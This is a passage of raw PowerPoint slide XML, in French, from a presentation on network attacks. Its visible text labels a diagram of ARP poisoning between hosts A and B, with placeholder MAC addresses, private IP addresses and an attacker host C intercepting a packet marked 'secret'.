          <a:xfrm>
            <a:off x="6325946" y="933918"/>
            <a:ext cx="1134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err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>aaaa:aaaa:aaaa</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="114" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7842009" y="933918"/>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effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.1</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="116" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6325946" y="1218993"/>
            <a:ext cx="12311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sz="1400" dirty="0" err="1">
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>b</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="fr-FR" sz="1400" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" err="1" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>bbb:bbbb:bbbb</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="117" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7842009" y="1218993"/>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effectLst/>
                <a:latin typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>192.168.1.2</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="fr-FR" sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none" normalizeH="0" baseline="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="23142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60"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="15" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="6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par>
                                <p:cTn id="24" presetID="10" presetClass="entr" presetSubtype="0" fill="hold" nodeType="with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fade">
                                      <p:cBhvr>
                                        <p:cTn id="26" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="8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82"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="8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p:bldP spid="82" grpId="0"/>
      <p:bldP spid="8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Attaques réseaux</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48</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Image 5" descr="C:\Users\Abdou\AppData\Local\Microsoft\Windows\INetCache\Content.Word\switch-por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6843" y="3689044"/>
            <a:ext cx="884431" cy="334214"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Groupe 6"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1074322" y="3470475"/>
            <a:ext cx="773743" cy="773743"/>
            <a:chOff x="17736" y="536836"/>
            <a:chExt cx="457350" cy="457363"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="14" name="Image 13"/>
            <p:cNvPicPr>
              <a:picLocks noChangeAspect="1"/>
            </p:cNvPicPr>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="17736" y="536836"/>
              <a:ext cx="457350" cy="457363"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="15" name="Zone de texte 32"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="180000" y="600317"/>
              <a:ext cx="229870" cy="2286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900" dirty="0">
                  <a:effectLst/>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>A</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="8" name="Groupe 7"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="9881265" y="3471477"/>
            <a:ext cx="773743" cy="772668"/>
            <a:chOff x="5021631" y="637128"/>
            <a:chExt cx="457200" cy="457200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="12" name="Image 11"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId4"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="5021631" y="637128"/>
              <a:ext cx="457200" cy="457200"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="13" name="Zone de texte 32"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5203339" y="689954"/>
              <a:ext cx="229870" cy="22796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900">
                  <a:effectLst/>
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
                  <a:cs typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>B</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="9" name="Groupe 8"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5203699" y="1968361"/>
            <a:ext cx="792011" cy="811355"/>
            <a:chOff x="2061351" y="238056"/>
            <a:chExt cx="479671" cy="479714"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="10" name="Image 9" descr="C:\Users\Abdou\Desktop\icons\pc-hack.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1351" y="238056"/>
              <a:ext cx="479671" cy="479714"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Zone de texte 32"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2225317" y="298673"/>
              <a:ext cx="229870" cy="2286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5000"/>
                </a:lnSpc>
                <a:spcAft>
                  <a:spcPts val="800"/>
                </a:spcAft>
              </a:pPr>
              <a:r>
                <a:rPr lang="fr-FR" sz="1200" dirty="0">
                  <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                  <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                </a:rPr>
                <a:t>C</a:t>
              </a:r>
              <a:endParaRPr lang="fr-FR" sz="1200" dirty="0">
                <a:effectLst/>
                <a:latin typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
                <a:ea typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="17" name="Tableau 16"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="71919" y="4434593"/>
          <a:ext cx="2798894" cy="928488"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="995673"/>
                <a:gridCol w="1803221"/>
              </a:tblGrid>
              <a:tr h="309496">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>Hote</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> A</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="309496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>MAC</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>aaaa:aaaa:aaaa</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="309496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>IP</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>192.168.1.1</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="18" name="Tableau 17"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst/>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="9111723" y="4398381"/>
          <a:ext cx="2798894" cy="928488"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{073A0DAA-6AF3-43AB-8588-CEC1D06C72B9}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="995673"/>
                <a:gridCol w="1803221"/>
              </a:tblGrid>
              <a:tr h="309496">
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>Hote</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> B</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr anchor="ctr"/>
                </a:tc>
                <a:tc hMerge="1">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:endParaRPr lang="fr-FR" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="309496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>MAC</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" err="1" smtClean="0"/>
                        <a:t>bbbb:bbbb:bbbb</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="309496">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>IP</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>192.168.1.2</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="21" name="Connecteur droit 20"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="6" idx="0"/>
            <a:endCxn id="10" idx="2"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5599059" y="2779716"/>
            <a:ext cx="646" cy="909328"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="22" name="Connecteur droit 21"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="12" idx="1"/>
            <a:endCxn id="6" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6041274" y="3856151"/>
            <a:ext cx="3839991" cy="1660"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="25" name="Connecteur droit 24"/>
          <p:cNvCxnSpPr>
            <a:stCxn id="14" idx="3"/>
            <a:endCxn id="6" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1848065" y="3856151"/>
            <a:ext cx="3308778" cy="1196"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:style>
          <a:lnRef idx="1">
            <a:schemeClr val="dk1"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:fillRef>
          <a:effectRef idx="0">
            <a:schemeClr val="dk1"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Rectangle 34"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="118291" y="805753"/>
            <a:ext cx="2816797" cy="584775"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ARP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" sz="3200" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>poisonning</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="3200" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Connecteur en angle 28"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5886671" y="2779716"/>
            <a:ext cx="3863714" cy="854405"/>
          </a:xfrm>
          <a:prstGeom prst="bentConnector3">
            <a:avLst>
              <a:gd name="adj1" fmla="val 274"/>
            </a:avLst>
          </a:prstGeom>
          <a:ln>
            <a:tailEnd type="triangle"/>
          </a:ln>
        </p:spPr>
        <p:style>
          <a:lnRef idx="3">
            <a:schemeClr val="accent5"/>
          </a:lnRef>
          <a:fillRef idx="0">
            <a:schemeClr val="accent5"/>
          </a:fillRef>
          <a:effectRef idx="2">
            <a:schemeClr val="accent5"/>
          </a:effectRef>
          <a:fontRef idx="minor">
            <a:schemeClr val="tx1"/>
          </a:fontRef>
        </p:style>
      </p:cxnSp>
      <p:graphicFrame>
        <p:nvGraphicFramePr>
          <p:cNvPr id="37" name="Tableau 36"/>
          <p:cNvGraphicFramePr>
            <a:graphicFrameLocks noGrp="1"/>
          </p:cNvGraphicFramePr>
          <p:nvPr>
            <p:extLst>
              <p:ext uri="{D42A27DB-BD31-4B8C-83A1-F6EECF244321}">
                <p14:modId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3185428180"/>
              </p:ext>
            </p:extLst>
          </p:nvPr>
        </p:nvGraphicFramePr>
        <p:xfrm>
          <a:off x="2107188" y="2751285"/>
          <a:ext cx="2465658" cy="809468"/>
        </p:xfrm>
        <a:graphic>
          <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/table">
            <a:tbl>
              <a:tblPr>
                <a:tableStyleId>{7DF18680-E054-41AD-8BC1-D1AEF772440D}</a:tableStyleId>
              </a:tblPr>
              <a:tblGrid>
                <a:gridCol w="2465658"/>
              </a:tblGrid>
              <a:tr h="809468">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" dirty="0" smtClean="0"/>
                        <a:t>MAC DST :</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" err="1" smtClean="0"/>
                        <a:t>cccc:cccc:cccc</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>IP DST: 192.168.1.2</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:r>
                        <a:rPr lang="fr-FR" sz="1400" baseline="0" dirty="0" smtClean="0"/>
                        <a:t>Data: secret</a:t>
                      </a:r>
                      <a:endParaRPr lang="fr-FR" sz="1400" dirty="0"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="41" name="AutoShape 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1" noTextEdit="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="58738" y="5464175"/>
            <a:ext cx="2805112"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5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="65088" y="5470525"/>
            <a:ext cx="278606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6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="65088" y="5780088"/>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Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1574800" y="5780088"/>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Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="65088" y="6089650"/>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Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1574800" y="6089650"/>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Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="65088" y="6399213"/>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Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1574800" y="6399213"/>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Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1574800" y="5773738"/>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0" name="Line 13"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="58738" y="5780088"/>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1" name="Line 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="58738" y="6089650"/>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2" name="Line 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="58738" y="6399213"/>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3" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="65088" y="5464175"/>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4" name="Line 17"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2851150" y="5464175"/>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5" name="Line 18"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="58738" y="5470525"/>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6" name="Line 19"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="58738" y="6708775"/>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7" name="Rectangle 20"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
